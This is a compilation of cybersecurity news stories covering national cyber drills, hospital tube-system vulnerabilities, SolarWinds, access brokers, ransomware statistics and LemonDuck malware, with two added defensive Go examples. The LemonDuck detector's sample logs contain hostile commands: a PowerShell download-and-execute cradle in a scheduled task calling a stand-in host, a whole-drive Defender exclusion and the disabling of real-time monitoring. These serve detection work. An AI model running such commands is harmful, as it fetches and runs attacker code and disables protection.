More stories


    A Cold War is raging in cyberspace. Here's how countries are preparing their defenses

    Countries in Central and Eastern Europe run regular drills of their cyber defenses, which have been extensively tested in recent cyberattacks.
    Cyberattacks are something every country has to deal with, but countries in Central and Eastern Europe are particularly wary of the recurring attacks on their critical infrastructure and governments.


    “Last year, we had over 4,300 incidents recorded,” Rytis Rainys, the director of the National Cyber Security Center of Lithuania, a country with a population of less than three million, tells ZDNet. “That comes down to over 100 each day. We are constantly dealing with this, and that makes having your national cyber defense in top-notch condition extremely important.”

    Most attacks in the region don’t make the headlines; others do. The attacks on Ukraine’s power grid in 2015 are still rooted in the collective memory of security professionals, while the global 2017 ransomware attack (NotPetya) was first noticed in Ukraine. A decade earlier, key Estonian institutions of government and finance came under attack, an event that prompted the country to bolster its cyber defenses and seek international partnerships. More recently, Polish government officials had their private mailboxes hacked and messages leaked. Many had used those accounts for government communications, something most security experts agree is not a good idea.

    Levelling the playing field

    The reason IT infrastructure in Central and Eastern Europe seems to come under attack more frequently has to do with its proximity to, and relationship with, Russia, says Andrzej Kozlowski, a cybersecurity expert at the Krakow-based think tank Kosciuszko Institute. “The main difference between non-state and state actors conducting cyberattacks is that the latter does not need to balance costs with benefits,” he tells ZDNet.

    Not only do states have many more resources at hand, but they also don’t need short-term financial gratification. “During the pandemic, we have seen attacks on medical facilities, which are aimed to just create an extra burden,” says Kozlowski.

    The Russian Federation in particular differs from other states in its methods. “These are not hackers employed by the state. Instead, we see a direct connection between actual cyber criminals and the secret service. When cyber criminals do something, nobody in Russia stops them and no one is ever extradited. This is unique. If you compare it to North Korea, for example, those are the security services doing the actual hacking.”

    The main benefit of that approach, according to Kozlowski, is the plausible deniability that shields the state from consequences: “From the perspective of the Russian Federation, cyberspace is a great place to realize their goals. In a conventional military sense, Russia is no match for NATO. But in cyberspace, they can operate on a level playing field.”

    Beyond the firewall

    So how do countries protect themselves? Lithuania regularly organizes cyber-defense exercises, both domestically and internationally, the most recent being Exercise Alarmex, held in May of this year. These pit a ‘Blue Team’ against a ‘Red Team’, with the latter attacking a mock IT infrastructure modelled on the one used in real life. “We use virtual machines to create that network of the different organizations, and then we create scenarios which involve the Red Team trying to break into the network of the Blue Team, who try to defend themselves,” says Rainys.

    Awareness plays a key role in this approach, which is why Lithuania’s National Cyber Security Center takes around half a year to prepare. Participating organizations do not know the scenarios beforehand, says Rainys. The exercises also test social engineering, with the Red Team receiving information on important players within the opposing organizations. “The Red Team would pose as internal IT personnel and call the executive directly to ask them for the password, or use other phishing methods,” he says.
    While in the past organizations were not always willing to participate, these days that is less of an issue. “Four years ago, when we started this, we had to really try to convince them, but companies and institutions see the need now,” says Rainys. “We have a matrix of around 100 organizations deemed nationally critical, and they are eager to participate as it’s a great security test which is basically free of charge for them.”

    Coordination is key, not just between different security teams, but between different organizational branches as well. “I participated in one such exercise myself,” Kozlowski says. “You also have different branches that hold their own responsibilities, such as the communication department that has to inform investors without causing panic.”

    Creating frameworks

    While the European Union gets criticism for being cumbersome, on cybersecurity it has been solid, says Kozlowski. “One of the main strengths we have in Europe is that we can create laws that are subsequently implemented over the entire European Union. So you have things like the GDPR and the NIS Directive 1, while they are working on a second document.”

    The result is that all members of the European Union will implement minimum cybersecurity standards, says Kozlowski, meaning even the weakest points within the bloc will be comparatively resilient and overseen by ENISA, the EU agency for cybersecurity.

    European countries also collaborate militarily within the Permanent Structured Cooperation (PESCO) framework, within which sit the Lithuanian-led Cyber Rapid Response Teams (CRRTs), which conduct regular cyber-readiness drills. There are also larger international exercises: Cyber Europe, organized by ENISA itself, and NATO’s Cyber Coalition. Their purpose is to improve the ability of incident management teams in different nations to collaborate, Rainys says.
    “During attacks, loads of IP addresses are being used, so you need to coordinate to be able to block them.”

    While no single country, or even a bloc of collaborating countries, is ever truly ready for cyberattacks, they do need to build up and constantly tune their cybersecurity systems. And it’s not just about resilience against the attacks themselves. “The European Commission under Ursula von der Leyen has put a priority on digitization, and among other things has added cyber diplomacy to the toolbox to react to certain attacks,” says Kozlowski. “The main aim of exercises is to show policy makers how to react.”


    IoT: Security researchers warn of vulnerabilities in hospital pneumatic tube systems

    Security researchers have detailed vulnerabilities in the system controlling the pneumatic tube networks used in thousands of hospitals around the world, which could allow hackers to disrupt the service or potentially launch ransomware attacks.

    The vulnerabilities were discovered in the Nexus Control Panel, which powers current models of Translogic’s pneumatic tube system (PTS) stations by Swisslog Healthcare. The tubes allow staff to send patient test samples and medication around the hospital and are a key part of providing care to patients.


    Dubbed PwnedPiper, the nine security vulnerabilities have been detailed by cybersecurity researchers at Armis ahead of a presentation on the findings at Black Hat USA.

    They include hard-coded passwords, a privilege escalation vulnerability, memory corruption bugs that can lead to remote code execution and denial of service, and a design flaw in which firmware upgrades on the Nexus Control Panel are unencrypted and don’t require any cryptographic signature. That last flaw could allow an attacker to gain unauthenticated remote code execution by initiating a firmware update procedure, while also maintaining persistence on the device.

    “It was surprisingly easy to find these vulnerabilities; too easy, I would say. Although this device has a crucial function in hospitals for the critical infrastructure, the type of vulnerabilities that we found are similar to stuff that you would find on an average IoT device,” Ben Seri, VP of research at Armis, told ZDNet.

    To reach a Nexus Control Panel, an attacker would first need some access to the hospital network, for example via a phishing attack or breached remote desktop credentials.
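    The unsigned-update flaw described above is exactly what a device-side verification step is meant to close. What follows is an added example written for this page, not Swisslog’s or Armis’s code, and the image layout it uses (a magic value, version, payload length, SHA-256 of the payload, the payload, then an Ed25519 signature over everything before it) is an assumption chosen for illustration. The point it demonstrates is the ordering: the updater parses only what it needs to locate the signature, verifies the signature under a public key pinned in the device before interpreting anything else, then checks the digest and refuses version rollback, so an unsigned or tampered image never reaches flash.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Hypothetical image layout used for this example (not the vendor's real format):
//   magic "FWIM" | version (uint32 BE) | payload length (uint32 BE) | SHA-256(payload) | payload | Ed25519 signature
// The signature covers every byte before it, so version and length are authenticated too.
var magic = []byte("FWIM")

const (
	headerLen = 4 + 4 + 4 + sha256.Size
	sigLen    = ed25519.SignatureSize
)

var (
	ErrFormat    = errors.New("malformed image")
	ErrSignature = errors.New("signature verification failed")
	ErrDigest    = errors.New("payload digest mismatch")
	ErrRollback  = errors.New("image version is not newer than the installed one")
)

// BuildImage is the vendor-side step: assemble the header, then sign header+payload.
func BuildImage(priv ed25519.PrivateKey, version uint32, payload []byte) []byte {
	hdr := make([]byte, headerLen)
	copy(hdr, magic)
	binary.BigEndian.PutUint32(hdr[4:], version)
	binary.BigEndian.PutUint32(hdr[8:], uint32(len(payload)))
	sum := sha256.Sum256(payload)
	copy(hdr[12:], sum[:])
	signed := append(hdr, payload...)
	return append(signed, ed25519.Sign(priv, signed)...)
}

// VerifyImage is the device-side gate that runs before a single byte reaches flash.
// It returns the payload and its version only when the image is well-formed, the
// signature verifies under the pinned public key, the embedded digest matches the
// payload, and the version is newer than what is installed (anti-rollback).
func VerifyImage(pub ed25519.PublicKey, installed uint32, img []byte) ([]byte, uint32, error) {
	if len(pub) != ed25519.PublicKeySize {
		return nil, 0, errors.New("bad pinned key")
	}
	// Length and magic checks first, so the slicing below is safe on hostile input.
	if len(img) < headerLen+sigLen || !bytes.Equal(img[:4], magic) {
		return nil, 0, ErrFormat
	}
	version := binary.BigEndian.Uint32(img[4:8])
	payloadLen := binary.BigEndian.Uint32(img[8:12])
	if uint64(headerLen)+uint64(payloadLen)+uint64(sigLen) != uint64(len(img)) {
		return nil, 0, ErrFormat
	}
	signed := img[:headerLen+int(payloadLen)]
	sig := img[headerLen+int(payloadLen):]
	// Authenticate before interpreting anything else: unsigned or tampered input
	// never reaches the digest or version logic.
	if !ed25519.Verify(pub, signed, sig) {
		return nil, 0, ErrSignature
	}
	payload := img[headerLen : headerLen+int(payloadLen)]
	if sum := sha256.Sum256(payload); !bytes.Equal(sum[:], img[12:headerLen]) {
		return nil, 0, ErrDigest
	}
	if version <= installed {
		return nil, 0, ErrRollback
	}
	return payload, version, nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	payload := []byte("constructed firmware payload")
	img := BuildImage(priv, 2, payload)

	_, v, err := VerifyImage(pub, 1, img)
	fmt.Println("genuine image:", v, err)

	tampered := append([]byte(nil), img...)
	tampered[headerLen] ^= 0x01 // flip one payload byte
	_, _, err = VerifyImage(pub, 1, tampered)
	fmt.Println("tampered image:", err)

	_, _, err = VerifyImage(pub, 1, img[:len(img)-sigLen]) // signature stripped
	fmt.Println("unsigned image:", err)

	_, _, err = VerifyImage(pub, 2, img) // same version as installed
	fmt.Println("rollback:", err)
}
```

    On a real device the private key never leaves the vendor’s build pipeline and only the public key is burned into the controller; encrypting the image is a separate concern (confidentiality of the firmware) and does not substitute for the signature, which is what stops an attacker on the hospital network from pushing their own image.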

    According to Armis, the infrastructure is used in more than 3,000 hospitals worldwide, including 2,300 in the United States. Researchers warn that by exploiting vulnerabilities in these systems, attackers could gain control over the tube network. The privilege escalation the vulnerabilities enable could also give attackers access to other sections of the network, to the extent that they could launch a ransomware attack against the hospital network.

    “It wasn’t difficult to find vulnerabilities here. It’s just the system that is hidden in plain sight. You don’t think about it and, normally, you don’t connect it being related to any critical functions – it’s a lack of knowledge of this area which leads to vulnerabilities,” said Seri.

    The vulnerabilities have been disclosed to Swisslog and security updates are available to close them and protect networks; healthcare organisations using Translogic’s PTS are urged to apply them.

    “I think the lesson to be learned here is that this is the story of IoT in a way. Many applications have moved over the years from analogue systems to digital systems and eventually to be connected to the network and then later to the internet,” said Seri. “From the hospital’s point of view, this is just another reason to go ahead and apply network segmentation in the most effective way possible,” he added.

    It’s also recommended that hospitals apply access controls across the network, such as multi-factor authentication, so that users can’t reach networks and systems they don’t have permission to use, which denies an intruder the same lateral movement. “Understanding that patient care depends not only on medical devices, but also on the operational infrastructure of a hospital is an important milestone to securing healthcare environments,” said Seri.
    Swisslog confirmed that Armis had contacted it about the vulnerabilities and that software updates and mitigations are now available to fix them and prevent their potential exploitation on hospital networks.

    “Swisslog Healthcare has already begun rolling out these solutions and will continue to work with its customers and affected facilities. Our commitment to security as an organizational priority has prepared us to address these types of issues with efficiency and transparency,” a spokesperson said.


    SolarWinds attackers breached email of US prosecutors, says Department of Justice

    The US Justice Department (DoJ) has revealed the extent to which hackers had access to officials’ emails through the SolarWinds breach it disclosed in January.

    The FBI, CISA, ODNI and the NSA said that month that it was most likely Kremlin-backed hackers that tainted a software update from enterprise IT vendor SolarWinds. Since then, the US and UK have officially blamed Russian intelligence services for the attack, and US president Joe Biden announced sanctions against Russia over it.


    The DoJ said in an updated statement that it was treating the source of the attack as an Advanced Persistent Threat (APT) that gained much broader access to the department’s Microsoft Office 365 (O365) email systems than the 3% of non-classified email it initially thought was accessed.

    “While other districts were impacted to a lesser degree, the APT group gained access to the O365 email accounts of at least 80% of employees working in the U.S. Attorneys’ offices located in the Eastern, Northern, Southern, and Western Districts of New York,” the DoJ said in a new statement.

    The department has published a list of the 27 districts that had one or more employees’ O365 email accounts compromised in the SolarWinds attack. The compromised accounts affected both the US government and the private sector, it added.

    The DoJ has also disclosed that the hackers had access to the compromised email accounts for more than seven months, from around May 7 to December 27, 2020.

    “The Department is responding to this incident as if the Advanced Persistent Threat (APT) group responsible for the SolarWinds breach had access to all email communications and attachments found within the compromised O365 accounts,” the DoJ said. Compromised data included all sent, received and stored emails and attachments found within those accounts during that time, it said.

    The SolarWinds breach resulted in the compromise of major US tech and cybersecurity companies and key federal agencies, including the US Treasury Department, the Cybersecurity and Infrastructure Security Agency (CISA), the Department of Homeland Security (DHS), the US Department of State and the US Department of Energy (DOE).


    Ransomware operators love them: Key trends in the Initial Access Broker space

    The Initial Access Broker market continues to expand, with fees a drop in the ocean in comparison to the potential rewards of a successful ransomware attack. 

    Initial Access Brokers (IABs) are individuals or groups who have quietly obtained access to a corporate network or system through means including, but not limited to, stolen credentials, brute-force attacks, or exploitation of vulnerabilities.

    In recent years, ransomware-as-a-service (RaaS) groups have taken an interest in these brokers: by employing them directly or paying them a fee in return for access to a target system, they are able to skip the first step of intrusion, the time-consuming process of finding a vulnerable endpoint.

    On Monday, cybersecurity firm KELA published a report exploring the Initial Access Broker market and found that the average cost of network access was $5,400, while the median price was $1,000. When you consider that today’s ransomware demands reach millions of dollars, from a criminal’s perspective this is a small price to pay.

    The team examined over a thousand listings in dark web underground forums from July 1, 2020, to June 30, 2021, and found that initial access ads included a range of network and compromised-account offerings, such as remote access to a computer in an organization, as well as domain-level privileged account access and both RDP- and VPN-based remote access. In total, 25% of the listings were posted by brokers.

    Unsurprisingly, the most valuable offers, and therefore those earning the top prices, were initial access services offering domain-level privileges in companies boasting hundreds of millions of dollars in revenue. The most expensive were access to an Australian company generating annual revenue of $500 million, for 12 Bitcoin (BTC), or roughly $478,000, and access to an IT company in the United States through ConnectWise, for 5 BTC ($200,000). Access to small companies may cost as little as $200.

    “While some actors are ready to work for a percentage (a share from the amount gained in a successful ransomware attack), the majority of IAB prefer to stick to fixed prices,” KELA says.

    It should also be noted that as a string of high-profile ransomware attacks, including Kaseya and Colonial Pipeline, has put law enforcement and governments on notice, some brokers are moving from public adverts to private conversations with RaaS groups.

    As the bottom line is at the heart of this business model, some Initial Access Brokers were also linked to data theft, potentially in order to sell stolen records in bulk as an alternative revenue stream when their access is not purchased. Top impacted countries included the United States, UK, Australia, France and Canada.

    The report does note that there seems to be some form of honor among thieves, with few ads found that relate to healthcare systems, such as those operated by hospitals.

    “IABs have become professional participants of the RaaS economy,” KELA says. “They constantly find new initial access vectors, expanding the attack surface, and follow their customers’ demands.”


    Toll unsure if it lawyered up to avoid ASD assistance following ransomware attack

    Australian logistics giant Toll is not sure whether it was the company that avoided assistance from the government when it was struck by ransomware. Last year, Toll fell victim to ransomware on two occasions.

    Appearing before the Parliamentary Joint Committee on Intelligence and Security (PJCIS) last month as part of its review of the Security Legislation Amendment (Critical Infrastructure) Bill 2020, Toll global head of information security Berin Lautenbach said his organisation had help from the Australian Signals Directorate (ASD), which included having software installed on its systems.

    During the hearing, Lautenbach, like the other organisations testifying before the PJCIS, was asked if it was his company that ASD Director-General Rachel Noble was referring to when she revealed a company had declined to talk to the agency about an incident it had experienced. At the time, Lautenbach said “certainly not”. In a submission [PDF] made available on Monday, Toll has revised that testimony.

    “We are very grateful for the Australian Signals Directorate’s (ASD) support during the two cyber attacks Toll experienced in 2020. Toll is not in a position to know which company Ms Noble is referring to, and while indeed it may be Toll, we note that the ASD has never raised any formal concerns with our response to date,” the company wrote. “Following further internal discussions, we continue to be of the opinion that Toll acted transparently and cooperatively with the ASD. However, we recognise that we may not have responded at the pace the ASD may have expected due to the crisis we were experiencing.”

    Noble had told the PJCIS in June that the ASD found out about the attack at a well-known company after reading about it in the media.

    “Then we tried to reach out to the company to clarify if the media reports were true, and they didn’t want to talk to us. We kept pushing … at times, we have spent nearly a week negotiating with lawyers about us even being able to obtain just the basic information,” she said. “Asking, ‘Can we please just have some data from your network; we might be able to help by telling you quickly who it is, what they’re doing and what they might do next?’”

    Noble said that five days later, the ASD was still getting “very sluggish engagement”. “On day 14, we were only able to provide them with generic protection advice, and their network was still down. Three months later they got reinfected and we started again,” she said.

    Toll’s first attack happened in January, with the company reporting the second incident in late May. Noble in March last year told the Foreign Affairs, Defence and Trade Legislation Committee as part of Senate Estimates that the ASD and its Australian Cyber Security Centre (ACSC) had been working with Toll.

    “Throughout February this year, the ACSC has worked closely with Toll Group, at their behest, in relation to their recent ransomware incident,” she said in a statement entered straight into Hansard. “Our assistance has included providing technical experts to identify the nature and extent of the compromise, and provide Toll with tailored mitigation advice.”


    Zoom to pay $85m to settle privacy violation and zoombombing allegations

    Zoom has agreed to an $85 million settlement of a class action lawsuit that accused the company of improperly sharing user data through third-party software integrations with various digital platforms. The preliminary settlement [PDF] was filed over the weekend and is currently awaiting court approval.

    From March to May last year, 14 lawsuits were filed against Zoom, which were then consolidated into a single class action. The class members claimed Zoom misled users about its encryption capabilities, shared user data with digital platforms without consent, and had inadequate security and privacy controls, which resulted in zoombombings. Zoombombings are unwanted and unauthorised interruptions of Zoom meetings by outside participants. The US Department of Justice warned last year that zoombombing is prosecutable, with people who conduct it liable to fines or arrest on a variety of state or federal charges.

    The $85 million, if approved, would be allocated so that users who paid for an account are eligible to receive 15% of what they paid to Zoom for their core Zoom Meetings subscription from April to October 2020, or $25, whichever is greater. Other users who did not have a paying account may be eligible to receive up to $15. While Zoom earned $1.3 billion in subscriptions from class members, the plaintiffs’ lawyers said the $85 million settlement was reasonable in light of the significant risks of litigation.

    “Although plaintiffs firmly believe their liability case is strong and that class certification is warranted, it is uncertain whether the court ultimately would grant certification, deny a motion for summary judgment filed by Zoom, or ever find that plaintiffs are entitled to damages,” the plaintiffs’ lawyers added.

    Along with the $85 million payment, Zoom has also agreed to implement various changes focused on improving security, bolstering privacy and safeguarding consumer data. The company will provide in-meeting notifications to make it easier for users to understand who can see, save and share their information and content, by alerting users when a meeting host or another participant uses a third-party application during a meeting. Zoom will also not reintegrate the Facebook software development kit (SDK) for iOS into Zoom meetings for a year, and will request that Facebook delete any US user data obtained from the SDK.

    In the settlement motion, the plaintiffs’ lawyers have also applied for $21.25 million in legal fees, 25% of the settlement fund. Under the settlement, Zoom denies any wrongdoing alleged in the lawsuit.


    Ransomware attempt volume sets record, reaches more than 300 million for first half of 2021: SonicWall

    A new report from SonicWall found that attempted ransomware attacks skyrocketed in the first half of 2021, with 304.7 million attempted attacks seen by the company. SonicWall researchers saw record numbers of attempted attacks in both April and May, but both months were beaten by June, which had a record 78.4 million attempted ransomware attacks.

    The total number of ransomware attempts seen by SonicWall in the first half of 2021 surpassed the 2020 full-year total of 304.6 million. The fact that the first six months of 2021 had already exceeded all of 2020 alarmed SonicWall researchers, who added that it represented a 151% year-on-year increase.

    “Even if we don’t record a single ransomware attempt in the entire second half (which is irrationally optimistic), 2021 will already go down as the worst year for ransomware SonicWall has ever recorded,” the report said.

    According to the 2021 SonicWall Cyber Threat Report, ransomware volume seen by the company hit massive year-to-date spikes in the US (185%) and the UK (144%). The US, UK, Germany, South Africa and Brazil topped the list of countries most impacted by ransomware in the first half of 2021. Within the US, the hardest-hit state was Florida, which saw 111.1 million ransomware attempts. New York had 26.4 million, Idaho saw 20.5 million, and Rhode Island and Louisiana each dealt with nearly 9 million.

    The report was compiled from information gathered by the SonicWall Capture Threat Network, which “monitors and collects information from global devices”, including more than 1.1 million security sensors in 215 countries and territories. The report also draws on cross-vector, threat-related information shared among SonicWall security systems, including firewalls, email security devices, endpoint security solutions, honeypots, content filtering systems and the SonicWall Capture Advanced Threat Protection multi-engine sandbox. The network collects malware and IP reputation data from tens of thousands of firewalls and email security devices around the globe, and the report also gleans insights from threat intelligence shared by more than 50 industry collaboration groups and research organizations.

    The report notes that the ransomware problem continues to worsen, and the data shows that Q2 was far worse than Q1 in 2021. Q2 was the worst quarter ever recorded by the company, with a ransomware volume of 188.9 million, far surpassing the Q1 figure of 115.8 million. Ransomware attacks are also increasingly spreading worldwide: Europe suffered a 234% increase in ransomware volume while North America saw an increase of 180%. Asia saw its high point in March. But the US still leads the way globally, nearly matching the combined ransomware volume of the next nine countries on the top-10 list of most attacked countries.

    For 2021, the most commonly attacked industry is government, seeing three times as many attacks as last year. Government targets face more attacks than almost every other industry each month. By June, government customers saw 10 times as many ransomware attempts, an overall spike of 917%. Customers in the education field also saw a significant number of ransomware attempts, with an increase of 615%. SonicWall Capture Labs threat researchers found alarming ransomware spikes across healthcare (594%) and retail (264%) organizations as well.

    The Ryuk, Cerber and SamSam ransomware families accounted for 64% of all attempted ransomware attacks, according to data from SonicWall’s Capture Labs. Ryuk alone accounted for 93.9 million attempts, tripling the number of Ryuk attempts seen in the first six months of 2020. Cerber ended 2020 as the second most seen ransomware family, according to SonicWall, and continued this trend with 52.5 million attempted attacks in the first six months of 2021, ramping up in April and May. SamSam doubled its 2020 volume in the first half of 2021 with 49.7 million attempted attacks; in June alone, 15.7 million SamSam attempts were seen.

    SonicWall CEO Bill Conner said the latest data shows that sophisticated threat actors are adapting their tactics and embracing ransomware to reap financial gain and sow discord. “With remote working still widespread, businesses continue to be highly exposed to risk, and criminals are acutely aware of uncertainty across the cyber landscape,” Conner said.
    SonicWall
    The report also tracks malware, finding that the instances seen by SonicWall have been decreasing since their peak of 10.5 billion in 2018. Malware reached a six-year low in 2020 with 5.6 billion attempts, and 2021 saw 2.5 billion malware attempts in its first six months.

    “But as it will become apparent by reading the rest of this report, less malware isn’t the same as less cybercrime. Instead, it’s a sign that the traditional malware associated with spray-and-pray attacks of yesterday is being abandoned…usually in favor of more specialized, more sophisticated and more targeted attacks, capable of making criminals much more money and leaving much more devastation in their path,” the report said.

    Both North America and Europe saw dips in malware volume but Asian countries saw a 23% increase. Malware skyrocketed in India and Germany in the first part of the year, with India seeing 147.2 million malware attempts, an increase of 83% year over year, and Germany seeing 150.4 million malware attempts, a staggering 465% increase. SonicWall researchers note that some countries outside of the top-10 list were still suffering from malware: an organization in Vietnam had a 36.4% chance of seeing a malware attempt, higher than in any other country. The company’s Real-Time Deep Memory Inspection (RTDMI) engine also discovered 185,945 “never-before-seen” malware variants, up 54% from the first half of 2020.

    The report did include some good news: the volume of malicious PDF files and Office files dropped for the first time since 2018. Malware targeting IoT, however, skyrocketed in 2021 with more than 32 million attacks, and in the US attempts on IoT increased by 15%. “While the nine vulnerabilities, collectively known as ‘Name:Wreck,’ all have patches available as of the time of this writing, many IoT devices lack the ability to be easily patched (or patched at all), meaning we may see attacks arising from these vulnerabilities for years into the future,” the report noted.

    Cryptojacking attempts also grew a staggering amount in the first half of 2021. There were 51.1 million cryptojacking attempts in the period, with the number rising 118% in Asia and 248% in Europe.

    “The continued rise of ransomware, cryptojacking and other unique forms of malware targeted at monetization, along with their evolution of tactics, are evidence that cybercriminal activity always follows the money and rapidly adapts to new opportunities and changing environments,” said SonicWall Vice President of Platform Architecture Dmitriy Ayrapetov.


    Microsoft: This Windows and Linux malware does everything it can to stay on your network

    Microsoft has continued its analysis of the LemonDuck malware, known for installing crypto-miners in enterprise environments, and makes a strong case for why it is worth removing it from your network.

    The group behind it, according to Microsoft, has a well-stocked arsenal of hacking tools, tricks and exploits aimed at one thing: keeping exclusive access to a compromised network for as long as possible. While crypto-mining malware could be just a nuisance, LemonDuck’s behaviour suggests the group really does try to own compromised networks: disabling anti-malware, removing rival malware, and even automatically patching vulnerabilities, a competitive effort to keep rival attackers from feeding off its turf.

    “This allows them to limit the visibility of the attack to [security operations center] analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present,” Microsoft explained in a follow-up to its earlier analysis of LemonDuck.

    The critical ProxyLogon Microsoft Exchange Server exploits from March and April were treated this way by LemonDuck attackers. They used the bugs to install web shells on unpatched Exchange servers for remote access and to install additional LemonDuck malware. In some cases, LemonDuck attackers used renamed copies of the Microsoft Exchange On-Premises Mitigation Tool (released by Microsoft on March 15) to fix the bug they had used to gain access in the first place, according to Microsoft. “They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities,” it adds. They also use file-less malware that executes in memory, and process injection, making it harder to remove from an environment.

    Microsoft’s description of LemonDuck’s techniques and tools suggests the group puts a lot of effort into being difficult to kick off a network, while using multiple methods to gain a foothold: exploits and password-guessing attacks against SSH, MSSQL, SMB, Exchange, RDP, Redis and Hadoop YARN on both Linux and Windows systems. LemonDuck’s automated entry relies on a small JavaScript file that launches a PowerShell process via CMD, which in turn launches Notepad and the PowerShell script embedded in the JavaScript. Manual entry includes RDP brute-force password attacks or the Exchange bugs.

    Human operators create scheduled tasks and scripts for file-less persistence by re-running the PowerShell download script that pulls in command and control (C2) infrastructure. It’s all about re-enabling any malware components that have been disabled or removed; remember that web shells persist on a system even after the vulnerability used to plant them is patched. To make persistence more resilient, they host scripts on multiple sites (making takedown difficult), and as a backup also use WMI event consumers, or an arsenal of tools that includes RDP access, Exchange web shells, ScreenConnect and remote access tools (RATs).

    LemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds the entire C: drive to the Microsoft Defender exclusion list. Windows 10 Tamper Protection should prevent these actions. Other vendors targeted by LemonDuck’s anti-malware removal activities include ESET, Kaspersky, Avast, Norton Security and Malwarebytes.

    Once inside a network, one of LemonDuck’s tools checks whether a compromised device is running Outlook. If so, it scans the mailbox for contacts and starts spreading malware in emails with .zip, .js, or .doc/.rtf files attached.
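    Microsoft’s own hunting queries are in its write-up; the following is an added example written for this page, not Microsoft’s code, showing what a minimal detection for the Defender-tampering and re-infection behaviour described above looks like when run over command-line telemetry. The log lines are constructed for the example (timestamp, host, parent process and command line, roughly the shape of PowerShell script-block or process-creation records) and the rule names are made up here. The rules flag an exclusion that covers a whole drive rather than a specific path, a Defender protection feature switched off, and a scheduled task whose action is a PowerShell download cradle; Tamper Protection blocks the first two where it is on, which is exactly why seeing them in logs on a host where it is off deserves attention.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one alert raised over a log line (1-based line number).
type Finding struct {
	Line   int
	Rule   string
	Detail string
}

var (
	// Add-MpPreference -ExclusionPath <paths> ... : capture the path argument(s) up to
	// the next -Parameter or end of line.
	reExclusion = regexp.MustCompile(`(?i)Add-MpPreference\b[^;|]*?-ExclusionPath\s+([^;|]+?)(?:\s+-[A-Za-z]|\s*$)`)
	// Set-MpPreference -Disable<Protection> $true|1 : a protection feature switched off.
	reDisable = regexp.MustCompile(`(?i)Set-MpPreference\b[^;|]*?-Disable(RealtimeMonitoring|BehaviorMonitoring|IOAVProtection|IntrusionPreventionSystem)\s+(?:\$true|1)\b`)
	// schtasks /create ... powershell ... download cradle: the re-infection task LemonDuck relies on.
	reTaskCradle = regexp.MustCompile(`(?i)schtasks(?:\.exe)?\s+/create\b.*powershell.*(?:DownloadString|DownloadFile|IEX|Invoke-Expression)`)
)

// isBroadExclusion reports whether an exclusion path covers a whole drive
// (C:, C:\, C:\*, %SystemDrive%) or everything (\), which blinds Defender entirely.
func isBroadExclusion(p string) bool {
	p = strings.Trim(p, `"' `)
	p = strings.TrimRight(p, `\*`)
	p = strings.ToUpper(p)
	if p == "" || p == "%SYSTEMDRIVE%" {
		return true
	}
	return len(p) == 2 && p[1] == ':' && p[0] >= 'A' && p[0] <= 'Z'
}

// Scan runs the three rules over each line and returns the findings in order.
func Scan(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		n := i + 1
		if m := reExclusion.FindStringSubmatch(line); m != nil {
			// The argument may be a comma-separated list; one broad entry is enough.
			for _, p := range strings.Split(m[1], ",") {
				if isBroadExclusion(p) {
					out = append(out, Finding{n, "defender-broad-exclusion", strings.TrimSpace(p)})
					break
				}
			}
		}
		if m := reDisable.FindStringSubmatch(line); m != nil {
			out = append(out, Finding{n, "defender-protection-disabled", m[1]})
		}
		if reTaskCradle.MatchString(line) {
			out = append(out, Finding{n, "scheduled-task-download-cradle", ""})
		}
	}
	return out
}

// SampleLines are constructed for this example, in the shape of PowerShell
// script-block / process-creation records; they are not real telemetry.
var SampleLines = []string{
	`2021-07-22T03:14:05Z WS-0417 powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force`,
	`2021-07-22T03:14:06Z WS-0417 powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true`,
	`2021-07-22T03:14:07Z WS-0417 cmd.exe schtasks /create /sc minute /mo 60 /tn "Rtsa" /tr "powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://t.example/a.jsp')" /F`,
	`2021-07-22T09:02:11Z WS-0912 powershell.exe Add-MpPreference -ExclusionPath 'C:\Program Files\Vendor\App' -ExclusionProcess app.exe`,
	`2021-07-22T09:03:40Z WS-0912 powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false`,
}

func main() {
	for _, f := range Scan(SampleLines) {
		fmt.Printf("line %d: %s %s\n", f.Line, f.Rule, f.Detail)
	}
}
```

    Only the first three sample lines produce findings: the fourth excludes a specific application directory, which is routine administration, and the fifth turns real-time monitoring back on. In production the same three checks sit more naturally in the EDR or SIEM query language, but the distinction between a drive-root exclusion and a scoped one is the part worth carrying over, because a rule that alerts on every Add-MpPreference call drowns in legitimate change.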
    “The attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector,” Microsoft explains. “The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don’t gain web shell access the way they had.”

    In other words, LemonDuck might only be deploying crypto-miners that drain CPU resources, but the lengths the operators go to in order to stay on a network put them in a different light than just a nuisance. It could be well worth security teams’ time to review Microsoft’s tips, towards the end of its analysis, for hunting down LemonDuck threats and tools on a network, because once LemonDuck is aboard, it really doesn’t want to leave.